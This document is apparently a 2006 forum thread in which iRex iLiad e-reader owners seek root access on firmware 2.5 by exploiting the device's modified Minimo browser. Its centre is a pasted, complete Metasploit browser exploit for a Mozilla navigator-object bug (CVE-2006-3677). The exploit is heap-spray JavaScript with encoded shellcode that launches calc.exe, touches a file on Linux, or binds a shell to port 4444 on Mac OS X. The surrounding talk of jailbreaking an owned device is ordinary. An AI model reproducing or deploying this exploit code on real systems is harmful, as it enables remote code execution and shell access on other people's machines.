Can you tell me what is the current status quo for gaining root access in firmware 2.5? I know some people tried to brute force the password, alas that could take a *long* time.

Brute forcing the pasword will not be needing, because a netcat can be installed, and even busybox incoporates one.

What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and also to enable the save as... window in any application would work.

I do not know how to do it. An interesting list of mozilla bugs is here
http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci1180286,00.html
but I do not know if they apply to the modifyed minimo browser we run.

Any other starting points should be appreciated.

Users of 2.4 can try to upgrade to 2.5 keeping control along a delicate process, which I failed to complete sucessfully (but I describe in a separate thread).

Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_bug.cgi?format=guided%0F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?

Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:

http://forums.mozillazine.org/viewforum.php?f=47
https://bugzilla.mozilla.org/enter_bug.cgi?format=guided%0F%22uct=Minimo

A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK?

If i could safely assume it is to be soon, I would not be looking into this, as their promise is that any developer wil be able to run their own readers. I am not worried if I need to run xdvi as user instead of root. But yes, a motive for the delay is, I guess, that they need to discuss and decide if they need a user separated from root, so a possible consequence of the delay is that the machine will be theoretically more restricted internally.

Has anyone tried this exploit (http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html) that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

The following bug (mfsa2006-45 (http://www.mozilla.org/security/announce/2006/mfsa2006-45.html)) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48 (http://www.mozilla.org/security/announce/2006/mfsa2006-48.html)) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration (http://metasploit.com/users/hdm/tools/browserfun/mobb_028.html)

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution (http://osvdb.org/27559)

Here the full code of the exploit. Seems it requires a Java plugin which I am not sure exists in the case of Minimo.


<script>

// MoBB Demonstration
function Demo() {

// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677

// The Java plugin is required for this to work

// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u01 78%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee %u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u 0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb 01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040 %uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u 808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc0 83%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7 %u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;

// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u73 2f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400 %u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u 4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u38 00%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800 %u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u 0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u02 78%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278 %u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u 38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c 7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4 %u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%u ffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u02 78%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028 %u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u 7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f 62%u696e%u2f63%u7368%u0000%u0000');
var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;

// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u11 02%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351 %u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u 9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%uff f1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3 %u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;


// Start the browser detection
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;

if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}

if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}

if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}

if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}

if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}

var b = fill;
while (b.length <= 0x400000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}


if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}

</script>

Has anyone tried this exploit (http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html) that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...

It is a java plugin explit in theory. But I am going to give a try.

I see some no-crack alternatives:

1)If chrome privileges are enabled or they can be reached, then a New File ('/tmp/example') javascript call is all we need. See http://docs.mandragor.org/files/Misc/Mozilla_applications_en/mozilla-chp-5-sect-5.html
Problem being, I am not sure how fully the js libraries are provided in mozilla minimo (it is minimo). But perhaps they can be provided from any external file.

2)To learn how to build a javascript navigation toolbar *including Save As... button*; this button is disabled in minimo but it should exist. Perhaps toinvoke it does not require chrome priviledges.

i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.

/edit: tried to install an xpi, but cant do that either.

/edit: tried to install an xpi, but cant do that either.

I got to run the typical UML demo when you press a button and then a javascript application appears.

I got to run the typical UML demo when you press a button and then a javascript application appears.

But you cant save anything there. The xpi plugins have full acces to the filesystem :)

i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.

/edit: tried to install an xpi, but cant do that either.

The mess is that they use the libs of minimo but they modifyed the browser start-up application (called "browser", no "minimo", and installed from a different package).

Just as a clarification for the techno-idiot (me)... Wit 2.4 you could install all kinds of stuff and play with the system and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!

Gavrahil, I would say:

With 2.4 you could try to install all kinds of stuff and try to play with the system.

But you cant save anything there. The xpi plugins have full acces to the filesystem :)

It seems that they at iRex have modified the browser beyond minimo.

I was not expecting to need a xpi plugin; perhaps something simpler as old IE
document.execCommand('SaveAs')
that requires user interaction and should not be a priviledged command after all.


PS: Mozilla security releases are at
http://www.mozilla.org/projects/security/known-vulnerabilities.html

But you cant save anything there. The xpi plugins have full acces to the filesystem :)
As I am learning now -not in the iLiad-, the xpi "tars" (actually, pkzips?) are always granted "chrome" access if the user validates it, but I am not sure if in this case (modyfied minimo browser) javascript alone, as from a .xul file, has already some privilege.

I have been using the dump of 2.4 to look at the usr/lib/mozilla-minimo and it seems complete enough.

Yes, if we could get anything "installed" we would have complete access on the browser. But since they messed with the temp folder, which seems to be necessary, we cant get anything on the machine via the minimo browser.

Javascript which is not installed has only limited access.

Only thing that might get us in with minimo is some bug that allows malicious code to be executed.

But i dont have the time to look for something like that. :(

To add two cents:

I'm fed up. I'll wait for the SDK and the outcome of Riocaz' support nightmare (http://www.mobileread.com/forums/showthread.php?t=7089). Until then, I'll use the device for reading books, and I'll tell my friends to wait before ordering.

And then, if there is a SDK, and if it really opens the machine, and if I can get a reinstall for much less than 75 Euros, I'll start writing/porting some applications. But not now.